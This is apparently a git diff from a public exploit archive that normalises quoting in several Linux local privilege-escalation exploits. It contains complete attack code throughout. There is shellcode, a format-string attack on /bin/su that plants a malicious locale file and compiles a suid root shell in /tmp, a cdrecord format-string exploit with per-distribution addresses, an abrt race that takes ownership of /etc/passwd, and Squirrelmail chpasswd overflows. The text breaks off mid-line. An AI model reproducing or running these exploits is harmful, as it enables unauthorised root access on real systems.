-\"\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x30\\x2d\\x63\" -\"\\x30\" -\"chown root /tmp/xp;chmod 4777 /tmp/xp\"; +"\x31\xc0\x83\xc0\x17\x31\xdb\xcd\x80\xeb" +"\x30\x5f\x31\xc9\x88\x4f\x17\x88\x4f\x1a" +"\x8d\x5f\x10\x89\x1f\x8d\x47\x18\x89\x47" +"\x04\x8d\x47\x1b\x89\x47\x08\x31\xc0\x89" +"\x47\x0c\x8d\x0f\x8d\x57\x0c\x83\xc0\x0b" +"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8" +"\xcb\xff\xff\xff\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x2f\x62\x69\x6e\x2f\x73\x68\x30\x2d\x63" +"\x30" +"chown root /tmp/xp;chmod 4777 /tmp/xp"; -char *LC_MESSAGES = \"/tmp/LC_MESSAGES\"; +char *LC_MESSAGES = "/tmp/LC_MESSAGES"; int NOP_LEN = 12000; -char *msgfmt = \"/usr/bin/msgfmt\"; -char *objdump = \"/usr/bin/objdump\"; +char *msgfmt = "/usr/bin/msgfmt"; +char *objdump = "/usr/bin/objdump"; char *language = NULL; char *make_format_string(unsigned long, int, int); @@ -52,149 +52,149 @@ int main(int argc, char **argv) char randfile[1024]; char *args2[2], opt; - printf(\"su exploit by XP \\n\"); - printf(\"Enjoy!\\n\\n\"); + printf("su exploit by XP \n"); + printf("Enjoy!\n\n"); - while ((opt = getopt(argc, argv, \"o:n:m:O:e:l:\")) != EOF) + while ((opt = getopt(argc, argv, "o:n:m:O:e:l:")) != EOF) switch(opt) { - case \'o\': + case 'o': offset = atoi(optarg); break; - case \'n\': + case 'n': NOP_LEN = atoi(optarg); break; - case \'m\': + case 'm': msgfmt = strdup(optarg); break; - case \'O\': + case 'O': objdump = strdup(optarg); break; - case \'e\': - sscanf(optarg, \"%i:%i\", &eat, &pad); + case 'e': + sscanf(optarg, "%i:%i", &eat, &pad); break; - case \'l\': + case 'l': language = (char*) malloc(40 + strlen(optarg)); if (!language) { -printf(\"malloc failed\\naborting\\n\"); +printf("malloc failed\naborting\n"); exit(0); } memset(language, 0, 40 + strlen(optarg)); - sprintf(language, \"LANGUAGE=%s/../../../../../../tmp\", optarg); + sprintf(language, "LANGUAGE=%s/../../../../../../tmp", optarg); break; default: exit(0); } - printf(\"Phase 1. Checking paths and write permisions\\n\"); - printf(\" Checking for %s...\", msgfmt); + printf("Phase 1. Checking paths and write permisions\n"); + printf(" Checking for %s...", msgfmt); checkfor(msgfmt); - printf(\" Checking for %s...\", objdump); + printf(" Checking for %s...", objdump); checkfor(objdump); - printf(\" Checking write permisions on /tmp...\"); - if (stat(\"/tmp\", &st) < 0) { - printf(\"failed. cannot stat /tmp\\naborting\\n\"); + printf(" Checking write permisions on /tmp..."); + if (stat("/tmp", &st) < 0) { + printf("failed. cannot stat /tmp\naborting\n"); exit(0); } if (!(st.st_mode & S_IWOTH)) { - printf(\"failed. /tmp it\'s not +w\\naborting\\n\"); + printf("failed. /tmp it's not +w\naborting\n"); exit(0); } - printf(\"Ok\\n\"); + printf("Ok\n"); fflush(stdout); - printf(\" Checking read permisions on /bin/su...\"); - if (stat(\"/bin/su\", &st) < 0) { - printf(\"failed. cannot stat /bin/su\\naborting\\n\"); + printf(" Checking read permisions on /bin/su..."); + if (stat("/bin/su", &st) < 0) { + printf("failed. cannot stat /bin/su\naborting\n"); exit(0); } if (!(st.st_mode & S_IROTH)) { - printf(\"failed. /bin/su it\'s not +r\\naborting\\n\"); + printf("failed. /bin/su it's not +r\naborting\n"); exit(0); } - printf(\"Ok\\n\"); + printf("Ok\n"); fflush(stdout); if (!language) { - printf(\" Checking for a valid language...\"); + printf(" Checking for a valid language..."); search_valid_language(); - printf(\"Ok\\n\"); + printf("Ok\n"); } - printf(\" Checking that %s does not exist...\", LC_MESSAGES); + printf(" Checking that %s does not exist...", LC_MESSAGES); if (stat(LC_MESSAGES, &st) >= 0) { - printf(\"failed. %s exists\\naborting\\n\", LC_MESSAGES); + printf("failed. %s exists\naborting\n", LC_MESSAGES); exit(0); } - printf(\"Ok\\n\"); + printf("Ok\n"); fflush(stdout); - printf(\"Phase 2. Calculating eat and pad values\\n \"); + printf("Phase 2. Calculating eat and pad values\n "); srand(time(NULL)); - if (eat || pad) printf(\"skkiping, values set by user to eat = %i and -pad = %i\\n\", eat, pad); + if (eat || pad) printf("skkiping, values set by user to eat = %i and +pad = %i\n", eat, pad); else { calculate_eat_space(&eat, &pad); - printf(\"done\\n eat = %i and pad = %i\\n\", eat, pad); + printf("done\n eat = %i and pad = %i\n", eat, pad); } fflush(stdout); sh_addr -= offset; - printf(\"Phase 3. Creating evil libc.mo and setting enviroment -vars\\n\"); + printf("Phase 3. Creating evil libc.mo and setting enviroment +vars\n"); fflush(stdout); mkdir(LC_MESSAGES, 0755); chdir(LC_MESSAGES); - f = fopen(\"libc.po\", \"w+\"); + f = fopen("libc.po", "w+"); if (!f) { - perror(\"fopen()\"); + perror("fopen()"); exit(0); } - fprintf(f,\"msgid \\\"%%s: invalid option -- %%c\\\\n\\\"\\n\"); - fprintf(f,\"msgstr \\\"%s\\\\n\\\"\", make_format_string(sh_addr, eat, 0)); + fprintf(f,"msgid \"%%s: invalid option -- %%c\\n\"\n"); + fprintf(f,"msgstr \"%s\\n\"", make_format_string(sh_addr, eat, 0)); fclose(f); - sprintf(execbuf, \"%s libc.po -o libc.mo; chmod 777 libc.mo\", msgfmt); + sprintf(execbuf, "%s libc.po -o libc.mo; chmod 777 libc.mo", msgfmt); system(execbuf); nop_env = (char*) malloc(NOP_LEN + strlen(shellcode) + 1); if (!nop_env) { - printf(\"malloc failed\\naborting\\n\"); + printf("malloc failed\naborting\n"); exit(0); } memset(nop_env, 0x90, NOP_LEN + strlen(shellcode) + 1); - sprintf(&nop_env[NOP_LEN], \"%s\", shellcode); + sprintf(&nop_env[NOP_LEN], "%s", shellcode); env[0] = language; env[1] = NULL; - printf(\"Phase 4. Getting address of .dtors section of /bin/su\\n \"); + printf("Phase 4. Getting address of .dtors section of /bin/su\n "); dtors_addr = get_dtors_addr(); - printf(\"done\\n .dtors is at 0x%08x\\n\", dtors_addr); + printf("done\n .dtors is at 0x%08x\n", dtors_addr); fflush(stdout); - printf(\"Phase 5. Compiling suid shell\\n\"); + printf("Phase 5. Compiling suid shell\n"); fflush(stdout); make_suid_shell(); - printf(\"Phase 6. Executing /bin/su\\n\"); + printf("Phase 6. Executing /bin/su\n"); fflush(stdout); - args[0] = \"/bin/su\"; - args[1] = \"-\"; + args[0] = "/bin/su"; + args[1] = "-"; args[2] = make_ret_str(dtors_addr, pad); - args[3] = \"-w\"; + args[3] = "-w"; args[4] = nop_env; args[5] = NULL; - sprintf(randfile, \"/tmp/tmprand%i\", rand()); + sprintf(randfile, "/tmp/tmprand%i", rand()); if (!(pid = fork())) { close(1); @@ -203,11 +203,11 @@ vars\\n\"); dup2(fd, 1); dup2(fd, 2); execve(args[0], args, env); - printf(\"failed to exec /bin/su\\n\"); exit(0); + printf("failed to exec /bin/su\n"); exit(0); } if (pid < 0) { - perror(\"fork()\"); + perror("fork()"); exit(0); } @@ -215,32 +215,32 @@ vars\\n\"); unlink(randfile); - stat(\"/tmp/xp\", &st); + stat("/tmp/xp", &st); if (!(S_ISUID & st.st_mode)) { - printf(\"failed to put mode 4777 to /tmp/xp\\naborting\\n\"); + printf("failed to put mode 4777 to /tmp/xp\naborting\n"); exit(0); } - printf(\" - Entering rootshell ;-) -\\n\"); + printf(" - Entering rootshell ;-) -\n"); fflush(stdout); if (!(pid = fork())) { - args2[0] = \"/tmp/xp\"; + args2[0] = "/tmp/xp"; args2[1] = NULL; execve(args2[0], args2, NULL); - printf(\"failed to exec /tmp/xp\\n\"); + printf("failed to exec /tmp/xp\n"); exit(0); } if (pid < 0) { - perror(\"fork()\"); + perror("fork()"); exit(0); } waitpid(pid, &c, 0); - printf(\"Phase 7. Cleaning enviroment\\n\"); - sprintf(execbuf, \"rm -rf %s /tmp/xp\", LC_MESSAGES); + printf("Phase 7. Cleaning enviroment\n"); + sprintf(execbuf, "rm -rf %s /tmp/xp", LC_MESSAGES); system(execbuf); } @@ -254,17 +254,17 @@ char *make_format_string(unsigned long sh_addr, int eat, int test) memset(ret, 0, 0xffff); - for (c = 0; c < eat; c++) strcat(ret, \"%8x\"); + for (c = 0; c < eat; c++) strcat(ret, "%8x"); waste = 8 * eat; hi = (sh_addr & 0xffff0000) >> 16; lo = (sh_addr & 0xffff) - hi; if (!test) { - sprintf(&ret[strlen(ret)], \"%%0%ux%%hn\", hi-waste); - sprintf(&ret[strlen(ret)], \"%%0%ux%%hn\", lo); + sprintf(&ret[strlen(ret)], "%%0%ux%%hn", hi-waste); + sprintf(&ret[strlen(ret)], "%%0%ux%%hn", lo); } - else strcat(ret, \"%8x *0x%08x* %8x *0x%08x*\"); + else strcat(ret, "%8x *0x%08x* %8x *0x%08x*"); return ret; } @@ -276,22 +276,22 @@ unsigned long get_dtors_addr() FILE *f; unsigned long ret = 0, tmp1, tmp2, tmp3; - sprintf(file, \"/tmp/tmprand%i\", rand()); - sprintf(exec_buf, \"%s -h /bin/su > %s\", objdump, file); + sprintf(file, "/tmp/tmprand%i", rand()); + sprintf(exec_buf, "%s -h /bin/su > %s", objdump, file); system(exec_buf); - f = fopen(file, \"r\"); + f = fopen(file, "r"); if (!f) { - perror(\"fopen()\"); + perror("fopen()"); exit(0); } while (!feof(f)) { fgets(buf, 1024, f); - sscanf(buf, \" %i .%s %x %x \\n\", &tmp1, sect, &tmp2, &tmp3); - printf(\".\"); fflush(stdout); - if (strcmp(sect, \"dtors\")) continue; + sscanf(buf, " %i .%s %x %x \n", &tmp1, sect, &tmp2, &tmp3); + printf("."); fflush(stdout); + if (strcmp(sect, "dtors")) continue; ret = tmp3; break; } @@ -299,7 +299,7 @@ unsigned long get_dtors_addr() unlink(file); if (!ret) { - printf(\"error getting the address of .dtors\\naborting\"); + printf("error getting the address of .dtors\naborting"); exit(0); } @@ -344,41 +344,41 @@ void calculate_eat_space(int *eatr, int *padr) char *readbuf = NULL, *token; unsigned long t1, t2; - tmpfile[0] = \'\\0\'; + tmpfile[0] = '\0'; nop_env = (char*) malloc(NOP_LEN + strlen(shellcode) + 1); if (!nop_env) { - printf(\"malloc failed\\naborting\\n\"); + printf("malloc failed\naborting\n"); exit(0); } memset(nop_env, 0x90, NOP_LEN + strlen(shellcode) + 1); - sprintf(&nop_env[NOP_LEN], \"%s\", shellcode); + sprintf(&nop_env[NOP_LEN], "%s", shellcode); for (eat = 50; eat < 200; eat++) { for (pad = 0; pad < 4; pad++) { if (tmpfile[0]) unlink(tmpfile); - chdir(\"/\"); + chdir("/"); - sprintf(execbuf, \"rm -rf %s\", LC_MESSAGES); + sprintf(execbuf, "rm -rf %s", LC_MESSAGES); system(execbuf); mkdir(LC_MESSAGES, 0755); chdir(LC_MESSAGES); - f = fopen(\"libc.po\", \"w+\"); + f = fopen("libc.po", "w+"); if (!f) { -perror(\"fopen()\"); +perror("fopen()"); exit(0); } - fprintf(f,\"msgid \\\"%%s: invalid option -- %%c\\\\n\\\"\\n\"); - fprintf(f,\"msgstr \\\"%s\\\\n\\\"\", make_format_string(0xbfffffbb, eat, + fprintf(f,"msgid \"%%s: invalid option -- %%c\\n\"\n"); + fprintf(f,"msgstr \"%s\\n\"", make_format_string(0xbfffffbb, eat, 1)); fclose(f); - sprintf(execbuf, \"chmod 777 libc.po; %s libc.po -o libc.mo\", + sprintf(execbuf, "chmod 777 libc.po; %s libc.po -o libc.mo", msgfmt); system(execbuf); @@ -396,10 +396,10 @@ dup2(fds[1], 2); env[0] = language; env[1] = NULL; -args[0] = \"/bin/su\"; -args[1] = \"-\"; +args[0] = "/bin/su"; +args[1] = "-"; args[2] = make_ret_str(test_value, pad); -args[3] = \"-w\"; +args[3] = "-w"; args[4] = nop_env; args[5] = NULL; @@ -407,16 +407,16 @@ execve(args[0], args, env); } if (pid < 0) { -perror(\"fork()\"); +perror("fork()"); exit(0); } close(fds[1]); - sprintf(tmpfile, \"/tmp/tmprand%i\", rand()); + sprintf(tmpfile, "/tmp/tmprand%i", rand()); tmpfd = open(tmpfile, O_RDWR | O_CREAT); if (tmpfd < 0) { -perror(\"open()\"); +perror("open()"); exit(0); } while ((l = read(fds[0], buf, 1024)) > 0) @@ -429,16 +429,16 @@ write(tmpfd, buf, l); chmod(tmpfile, 0777); - f = fopen(tmpfile, \"r\"); + f = fopen(tmpfile, "r"); if (!f) { -perror(\"fopen()\"); +perror("fopen()"); exit(0); } if (readbuf) free(readbuf); readbuf = (char*) malloc(st.st_size); if (!readbuf) { -printf(\"malloc failed\\naborting\\n\"); +printf("malloc failed\naborting\n"); exit(0); } @@ -447,15 +447,15 @@ exit(0); fread(readbuf, 1, st.st_size, f); fclose(f); - token = strtok(readbuf, \"*\"); + token = strtok(readbuf, "*"); if (!token) continue; - token = strtok(NULL, \"*\"); + token = strtok(NULL, "*"); if (!token) continue; t1 = strtoul(token, NULL, 16); - token = strtok(NULL, \"*\"); + token = strtok(NULL, "*"); if (!token) continue; - token = strtok(NULL, \"*\"); + token = strtok(NULL, "*"); if (!token) continue; t2 = strtoul(token, NULL, 16); @@ -463,7 +463,7 @@ exit(0); if (t1 == (test_value+2)) { *eatr = eat; *padr = pad; - sprintf(execbuf, \"rm -rf %s\", LC_MESSAGES); + sprintf(execbuf, "rm -rf %s", LC_MESSAGES); system(execbuf); if (tmpfile[0]) unlink(tmpfile); return; @@ -471,16 +471,16 @@ if (t1 == (test_value+2)) { // sleep(10); } - printf(\".\"); + printf("."); fflush(stdout); } if (tmpfile[0]) unlink(tmpfile); - sprintf(execbuf, \"rm -rf %s\", LC_MESSAGES); + sprintf(execbuf, "rm -rf %s", LC_MESSAGES); system(execbuf); - printf(\"failed to calculate eat and pad values. glibc patched or -invalid language?\\naborting\\n\"); + printf("failed to calculate eat and pad values. glibc patched or +invalid language?\naborting\n"); exit(0); } @@ -489,11 +489,11 @@ void checkfor(char *p) int fd; fd = open(p, O_RDONLY); if (fd < 0) { - printf(\"failed\\naborting\\n\"); + printf("failed\naborting\n"); exit(0); } close(fd); - printf(\"Ok\\n\"); + printf("Ok\n"); fflush(stdout); } @@ -502,30 +502,30 @@ void make_suid_shell() FILE *f; char execbuf[1024]; - f = fopen(\"/tmp/kidd0.c\", \"w\"); + f = fopen("/tmp/kidd0.c", "w"); if (!f) { - printf(\" failed to create /tmp/kidd0.c\\naborting\\n\"); + printf(" failed to create /tmp/kidd0.c\naborting\n"); exit(0); } - fprintf(f, \"int main() { setuid(0); setgid(0); system(\\\"/bin/sh\\\"); -}\"); + fprintf(f, "int main() { setuid(0); setgid(0); system(\"/bin/sh\"); +}"); fclose(f); - sprintf(execbuf, \"gcc /tmp/kidd0.c -o /tmp/xp\"); + sprintf(execbuf, "gcc /tmp/kidd0.c -o /tmp/xp"); system(execbuf); - sprintf(execbuf, \"rm -f /tmp/kidd0.c\"); + sprintf(execbuf, "rm -f /tmp/kidd0.c"); system(execbuf); - f = fopen(\"/tmp/xp\", \"r\"); + f = fopen("/tmp/xp", "r"); if (!f) { - printf(\" failed to compile /tmp/kidd0.c\\naborting\\n\"); + printf(" failed to compile /tmp/kidd0.c\naborting\n"); exit(0); } fclose(f); - printf(\" /tmp/xp created Ok\\n\"); + printf(" /tmp/xp created Ok\n"); fflush(stdout); } @@ -534,30 +534,30 @@ void search_valid_language() DIR *locale; struct dirent *dentry; - locale = opendir(\"/usr/share/locale\"); + locale = opendir("/usr/share/locale"); if (!locale) { - perror(\"failed to opendir /usr/share/locale\"); - printf(\"aborting\\n\"); + perror("failed to opendir /usr/share/locale"); + printf("aborting\n"); exit(0); } while (dentry = readdir(locale)) { - if (!strchr(dentry->d_name, \'_\')) continue; + if (!strchr(dentry->d_name, '_')) continue; language = (char*) malloc(40 + strlen(dentry->d_name)); if (!language) { - printf(\"malloc failed\\naborting\\n\"); + printf("malloc failed\naborting\n"); exit(0); } memset(language, 0, 40 + strlen(dentry->d_name)); - sprintf(language, \"LANGUAGE=%s/../../../../../../tmp\",dentry->d_name); + sprintf(language, "LANGUAGE=%s/../../../../../../tmp",dentry->d_name); closedir(locale); - printf(\" [using %s] \", dentry->d_name); + printf(" [using %s] ", dentry->d_name); return; } - printf(\"failed to find a valid language\\naborting\\n\"); + printf("failed to find a valid language\naborting\n"); exit(0); } diff --git a/platforms/linux/local/273.c b/platforms/linux/local/273.c index 18e7f6576..b0be182eb 100755 --- a/platforms/linux/local/273.c +++ b/platforms/linux/local/273.c @@ -15,10 +15,10 @@ #include char shellcode[]= -\"\\x31\\xc0\\xb0\\x46\\x31\\xdb\\x31\\xc9\\xcd\\x80\\xeb\\x16\\x5b\\x31\\xc0\" -\"\\x88\\x43\\x07\\x89\\x5b\\x08\\x89\\x43\\x0c\\xb0\\x0b\\x8d\\x4b\\x08\\x8d\" -\"\\x53\\x0c\\xcd\\x80\\xe8\\xe5\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x73\" -\"\\x68\"; +"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0" +"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d" +"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73" +"\x68"; int main(int argc, char *argv[]) { @@ -29,16 +29,16 @@ char *buffer, *ptr; buffer = malloc(200); -printf(\"\\n*** Squirremail chpasswd local root exploit by 0x3142@hushmail.com ***\\n\\n\"); +printf("\n*** Squirremail chpasswd local root exploit by 0x3142@hushmail.com ***\n\n"); if(argc != 2) { -printf(\"Usage: %s \\n\\n\",argv[0]); +printf("Usage: %s \n\n",argv[0]); exit(0); } ret = 0xbffffffa - strlen(shellcode) - strlen(argv[1]); -// printf(\"Using ret = 0x%x\\n\\n\", ret); +// printf("Using ret = 0x%x\n\n", ret); ptr = buffer; addr_ptr = (long *) ptr; @@ -49,7 +49,7 @@ for(i=0; i < 200; i+=4) buffer[200-1] = 0; -execle(argv[1], \"chpasswd\", buffer, \"0x314\", \"m0s\", 0, env); +execle(argv[1], "chpasswd", buffer, "0x314", "m0s", 0, env); free(buffer); diff --git a/platforms/linux/local/31.pl b/platforms/linux/local/31.pl index 3fb3e4800..9673f840c 100755 --- a/platforms/linux/local/31.pl +++ b/platforms/linux/local/31.pl @@ -9,25 +9,25 @@ # Cdrecord 2.0 (i586-mandrake-linux-gnu) # # scsibus: -1 target: -1 lun: -1 -# Warning: Open by \'devname\' is unintentional and not supported. -# /usr/bin/cdrecord: No such file or directory. Cannot open \'. Cannot open SCSI driver. -# /usr/bin/cdrecord: For possible targets try \'cdrecord -scanbus\'. Make sure you are root. -# /usr/bin/cdrecord: For possible transport specifiers try \'cdrecord dev=help\'. +# Warning: Open by 'devname' is unintentional and not supported. +# /usr/bin/cdrecord: No such file or directory. Cannot open '. Cannot open SCSI driver. +# /usr/bin/cdrecord: For possible targets try 'cdrecord -scanbus'. Make sure you are root. +# /usr/bin/cdrecord: For possible transport specifiers try 'cdrecord dev=help'. # sh-2.05b# id # uid=0(root) gid=0(root) groups=503(wsxz) # sh-2.05b# ##################################################### $shellcode = - \"\\x31\\xc0\\x31\\xdb\\xb0\\x17\\xcd\\x80\".#setuid 0 - \"\\x31\\xdb\\x89\\xd8\\xb0\\x2e\\xcd\\x80\".#setgid 0 - \"\\xeb\\x1f\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\". - \"\\x46\\x0c\\xb0\\x0b\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\". - \"\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd\\x80\\xe8\\xdc\\xff\". - \"\\xff\\xff/bin/sh\"; + "\x31\xc0\x31\xdb\xb0\x17\xcd\x80".#setuid 0 + "\x31\xdb\x89\xd8\xb0\x2e\xcd\x80".#setgid 0 + "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89". + "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c". + "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff". + "\xff\xff/bin/sh"; - $cdrecordpath = \"/usr/bin/cdrecord\"; - $nop = \"\\x90\"; # x86 NOP + $cdrecordpath = "/usr/bin/cdrecord"; + $nop = "\x90"; # x86 NOP $offset = 0; # Default offset to try. @@ -35,45 +35,45 @@ $target = $ARGV[0]; $offset = $ARGV[1]; }else{ - printf(\" Priv8security.com Cdrecord local root exploit!!\\n\"); - printf(\" usage: $0 target\\n\"); - printf(\" List of targets:\\n\"); - printf(\" 1 - Linux Mandrake 8.2 Cdrecord 1.11a15\\n\"); - printf(\" 2 - Linux Mandrake 9.0 Cdrecord 1.11a32\\n\"); - printf(\" 3 - Linux Slackware 8.1 Cdrecord 1.11a24 not suid by default!!!\\n\"); - printf(\" 4 - Linux Mandrake 9.1 Cdrecord 2.0\\n\"); + printf(" Priv8security.com Cdrecord local root exploit!!\n"); + printf(" usage: $0 target\n"); + printf(" List of targets:\n"); + printf(" 1 - Linux Mandrake 8.2 Cdrecord 1.11a15\n"); + printf(" 2 - Linux Mandrake 9.0 Cdrecord 1.11a32\n"); + printf(" 3 - Linux Slackware 8.1 Cdrecord 1.11a24 not suid by default!!!\n"); + printf(" 4 - Linux Mandrake 9.1 Cdrecord 2.0\n"); exit(1); } - if ( $target eq \"1\" ) { + if ( $target eq "1" ) { $retword = 0x0807af38; #Mr .dtors ;) - $fmtstring = \"%.134727238x%x%x%x%x%x%x%x%x%n:\"; + $fmtstring = "%.134727238x%x%x%x%x%x%x%x%x%n:"; } - if ( $target eq \"2\" ) { + if ( $target eq "2" ) { # $retword = 0x08084578; #.dtors $retword = 0x08084684; #.GOT exit - $fmtstring = \"%.134769064x%x%x%x%x%x%x%x%x%n:\"; + $fmtstring = "%.134769064x%x%x%x%x%x%x%x%x%n:"; } - if ( $target eq \"3\" ) { + if ( $target eq "3" ) { $retword = 0x0807f658; - $fmtstring = \"%.134745456x%x%x%x%x%x%x%x%x%x%x%n:\"; + $fmtstring = "%.134745456x%x%x%x%x%x%x%x%x%x%x%n:"; } - if ( $target eq \"4\" ) { + if ( $target eq "4" ) { $retword = 0x0808c82c; #.GOT exit - $fmtstring = \"%.134802669x%x%x%x%x%x%x%x%x%n:\"; + $fmtstring = "%.134802669x%x%x%x%x%x%x%x%x%n:"; } - printf(\"Using target number %d\\n\", $target); - printf(\"Using Mr .dtors 0x%x\\n\",$retword); + printf("Using target number %d\n", $target); + printf("Using Mr .dtors 0x%x\n",$retword); - $new_retword = pack(\'l\', ($retword)); - $new_retshell = pack(\'l\', ($retshell)); + $new_retword = pack('l', ($retword)); + $new_retshell = pack('l', ($retshell)); $buffer2 = $new_retword; $buffer2 .= $nop x 150; $buffer2 .= $shellcode; $buffer2 .= $fmtstring; - exec(\"$cdrecordpath dev=\'$buffer2\' \'$cdrecordpath\'\"); + exec("$cdrecordpath dev='$buffer2' '$cdrecordpath'"); # milw0rm.com [2003-05-14] diff --git a/platforms/linux/local/36747.c b/platforms/linux/local/36747.c index 2c6ed6d40..843aab42e 100755 --- a/platforms/linux/local/36747.c +++ b/platforms/linux/local/36747.c @@ -26,19 +26,19 @@ // $ ./a.out /etc/passwd // [ wait a few minutes ] // Detected ccpp-2015-04-13-21:54:43-14183.new, attempting to race... -// Didn\'t win, trying again! +// Didn't win, trying again! // Detected ccpp-2015-04-13-21:54:43-14186.new, attempting to race... -// Didn\'t win, trying again! +// Didn't win, trying again! // Detected ccpp-2015-04-13-21:54:43-14191.new, attempting to race... -// Didn\'t win, trying again! +// Didn't win, trying again! // Detected ccpp-2015-04-13-21:54:43-14195.new, attempting to race... -// Didn\'t win, trying again! +// Didn't win, trying again! // Detected ccpp-2015-04-13-21:54:43-14198.new, attempting to race... // Exploit successful... // -rw-r--r--. 1 taviso abrt 1751 Sep 26 2014 /etc/passwd // -static const char kAbrtPrefix[] = \"/var/tmp/abrt/\"; +static const char kAbrtPrefix[] = "/var/tmp/abrt/"; static const size_t kMaxEventBuf = 8192; static const size_t kUnlinkAttempts = 8192 * 2; static const int kCrashDelay = 10000; @@ -57,27 +57,27 @@ int main(int argc, char **argv) // First argument is the filename user wants us to chown(). if (argc != 2) { - errx(EXIT_FAILURE, \"please specify filename to chown (e.g. /etc/passwd)\"); + errx(EXIT_FAILURE, "please specify filename to chown (e.g. /etc/passwd)"); } // This is required as we need to make different comm names to avoid // triggering abrt rate limiting, so we fork()/execve() different names. - if (strcmp(argv[1], \"crash\") == 0) { + if (strcmp(argv[1], "crash") == 0) { __builtin_trap(); } // Setup inotify, and add a watch on the abrt directory. if ((fd = inotify_init()) < 0) { - err(EXIT_FAILURE, \"unable to initialize inotify\"); + err(EXIT_FAILURE, "unable to initialize inotify"); } if ((watch = inotify_add_watch(fd, kAbrtPrefix, IN_CREATE)) < 0) { - err(EXIT_FAILURE, \"failed to create new watch descriptor\"); + err(EXIT_FAILURE, "failed to create new watch descriptor"); } // Start causing crashes so that abrt generates reports. if ((child = create_abrt_events(*argv)) == -1) { - err(EXIT_FAILURE, \"failed to generate abrt reports\"); + err(EXIT_FAILURE, "failed to generate abrt reports"); } // Now start processing inotify events. @@ -90,7 +90,7 @@ int main(int argc, char **argv) char command[1024]; // If this is a new ccpp report, we can start trying to race it. - if (strncmp(ev->name, \"ccpp\", 4) != 0) { + if (strncmp(ev->name, "ccpp", 4) != 0) { continue; } @@ -99,9 +99,9 @@ int main(int argc, char **argv) strncat(dirname, ev->name, sizeof dirname); strncpy(mapsname, dirname, sizeof dirname); - strncat(mapsname, \"/maps\", sizeof mapsname); + strncat(mapsname, "/maps", sizeof mapsname); - fprintf(stderr, \"Detected %s, attempting to race...\\n\", ev->name); + fprintf(stderr, "Detected %s, attempting to race...\n", ev->name); // Check if we need to wait for the next event or not. while (access(dirname, F_OK) == 0) { @@ -117,7 +117,7 @@ int main(int argc, char **argv) break; } - // This looks good, but doesn\'t mean we won, it\'s possible + // This looks good, but doesn't mean we won, it's possible // chown() might have happened while the file was unlinked. // // Give it a few microseconds to run chown()...just in case @@ -125,31 +125,31 @@ int main(int argc, char **argv) usleep(10); if (stat(argv[1], &statbuf) != 0) { - errx(EXIT_FAILURE, \"unable to stat target file %s\", argv[1]); + errx(EXIT_FAILURE, "unable to stat target file %s", argv[1]); } if (statbuf.st_uid != getuid()) { break; } - fprintf(stderr, \"\\tExploit successful...\\n\"); + fprintf(stderr, "\tExploit successful...\n"); - // We\'re the new owner, run ls -l to show user. - sprintf(command, \"ls -l %s\", argv[1]); + // We're the new owner, run ls -l to show user. + sprintf(command, "ls -l %s", argv[1]); system(command); return EXIT_SUCCESS; } } - fprintf(stderr, \"\\tDidn\'t win, trying again!\\n\"); + fprintf(stderr, "\tDidn't win, trying again!\n"); } } - err(EXIT_FAILURE, \"failed to read inotify event\"); + err(EXIT_FAILURE, "failed to read inotify event"); } -// This routine attempts to generate new abrt events. We can\'t just crash, +// This routine attempts to generate new abrt events. We can't just crash, // because abrt sanely tries to rate limit report creation, so we need a new // comm name for each crash. static pid_t create_abrt_events(const char *name) @@ -169,35 +169,35 @@ static pid_t create_abrt_events(const char *name) // Choose a new unused filename newname = tmpnam(0); - // Make sure we\'re not too fast. + // Make sure we're not too fast. usleep(kCrashDelay); // Create a new crashing subprocess. if ((pid = fork()) == 0) { if (link(name, newname) != 0) { - err(EXIT_FAILURE, \"failed to create a new exename\"); + err(EXIT_FAILURE, "failed to create a new exename"); } // Execute crashing process. - execl(newname, newname, \"crash\", NULL); + execl(newname, newname, "crash", NULL); // This should always work. - err(EXIT_FAILURE, \"unexpected execve failure\"); + err(EXIT_FAILURE, "unexpected execve failure"); } // Reap crashed subprocess. if (waitpid(pid, &status, 0) != pid) { - err(EXIT_FAILURE, \"waitpid failure\"); + err(EXIT_FAILURE, "waitpid failure"); } // Clean up the temporary name. if (unlink(newname) != 0) { - err(EXIT_FAILURE, \"failed to clean up\"); + err(EXIT_FAILURE, "failed to clean up"); } // Make sure it crashed as expected. if (!WIFSIGNALED(status)) { - errx(EXIT_FAILURE, \"something went wrong\"); + errx(EXIT_FAILURE, "something went wrong"); } } diff --git a/platforms/linux/local/417.c b/platforms/linux/local/417.c index 6e0d54991..306dcb6a0 100755 --- a/platforms/linux/local/417.c +++ b/platforms/linux/local/417.c @@ -30,17 +30,17 @@ #include #define NOP 0x90 -#define Fuckpr0 \"./chpasswd\" /* you need modify it by yourself */ +#define Fuckpr0 "./chpasswd" /* you need modify it by yourself */ #define LOOP 2000 /* loop of bruteforce */ /* setuid(0) shellcode by by Matias Sedalo 3x ^_^ */ -char shellcode[] =\"x31xdbx53x8dx43x17xcdx80x99x68x6ex2fx73x68x68\" -\"x2fx2fx62x69x89xe3x50x53x89xe1xb0x0bxcdx80\"; +char shellcode[] ="x31xdbx53x8dx43x17xcdx80x99x68x6ex2fx73x68x68" +"x2fx2fx62x69x89xe3x50x53x89xe1xb0x0bxcdx80"; unsigned long get_esp() { -__asm__ (\"movl %esp,%eax\"); +__asm__ ("movl %esp,%eax"); } @@ -52,7 +52,7 @@ value = malloc(size); if(value == NULL){ -printf(\"ERROR:virtual memory exhausted...n\"); +printf("ERROR:virtual memory exhausted...n"); exit(-1); @@ -74,16 +74,16 @@ pid_t pid; ret_addr = get_esp() - strlen(Fuckpr0) - strlen(shellcode); -printf(\"t-------------------------------------------------------n\"); -printf(\"t Squirrelmail 